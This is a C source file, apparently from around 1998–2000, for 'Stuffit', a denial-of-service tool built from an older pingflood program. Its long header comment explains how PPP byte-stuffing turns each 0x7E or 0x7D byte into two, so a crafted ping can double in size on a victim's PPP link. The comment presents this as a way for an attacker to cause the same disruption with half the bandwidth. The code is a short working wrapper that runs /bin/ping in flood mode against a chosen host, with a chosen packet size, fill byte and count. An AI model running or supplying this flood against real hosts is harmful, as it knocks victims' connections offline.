
/*   
   Stuffit.c
   Noc-Wage -*- wage@idirect.ca
           12/12/98

   This is just a modified version of:
   pingflood.c by (AntireZ) Salvatore Sanfilippo <md5330@mclink.it>
   enhanced by David Welton <davidw@cks.com>

   I simply made it so that it will generate the ping packets so
   that they contain 0x7e which is an illegal character in PPP 
   frames.  I also made it so you could set the size of the packet
   hopefully this came with my keen veracity article
   but incase it didn't here is part of it  so you understand why 
   this even exsists:

     Explanation of Byte Stuffing

   As explained in the PPP frame explanation there is a risk that 
   certain illegal values will end up in the information of a PPP 
   frame.  To solve this problem byte-stuffing is used.  In the 
   case of PPP frames the illegal value is changed to two bytes.
   One is the value 01111101 (0x7D) the other is the illegal 
   character XOR'd with 0x20.  In the case of 0x7E it will become
   0x7D, 0x5E.  This also makes any 0x7D which was not added by
   the PPP daemon to be encoded in the same manner to avoid 
   corrupting valid data.  What this means is that a single byte
   (for example 0x7E) will be converted into a pair of bytes
   (0x7D, 0x5E) but only when encapsulated in PPP frames.
   If 4-bytes in the datagram are 0x7E then each of those 4-bytes
   will be converted into the 0x7D, 0x5E pair.  This results in
   the 4-bytes being turned into 8-bytes when encapsulated in a 
   PPP frame.  This added data is known as "overhead".

   The implications of this is that maliciously engineered packets
   could be made to exploit the byte-stuffing method and can 
   cause a worst case overhead of 100%.  This means that a packet 
   could literally double in size when encapsulated in a PPP 
   frame. A 1024-byte ECHO_REQUEST could seem like 2048-bytes.  
   This means that an attacker requires half the bandwidth to
   cause the same amount of disruption.  This also means that if
   an attacker is on a PPP connection and is attempting this 
   attack he will also find that he requires as much bandwidth to 
   transmit the packets as the victim requires to recieve them.

   If you don't understand why this is a bad thing then don't 
   bother using this program because you'll most likely use
   it ineffectively.
   
   -March,2000     
    modified by spender
    Added option to choose how many pings to send.  Dunno if that
    messed up anything the author intended to do...

*/

#include <signal.h>

#define PING "/bin/ping"

main( int argc, char *argv[] )
{
  int pid_ping;
  if (argc != 5) {
    printf("use: %s <hostname> <size> <illegal char> (I'd suggest 7e or 7d) <number to send>\n", argv[0]);
    exit(0);
  }
  if(!(pid_ping = fork()))
    execl(PING, "ping","-f","-c", argv[4], "-s", argv[2], "-p", argv[3], argv[1]);
    exit(1);       
}
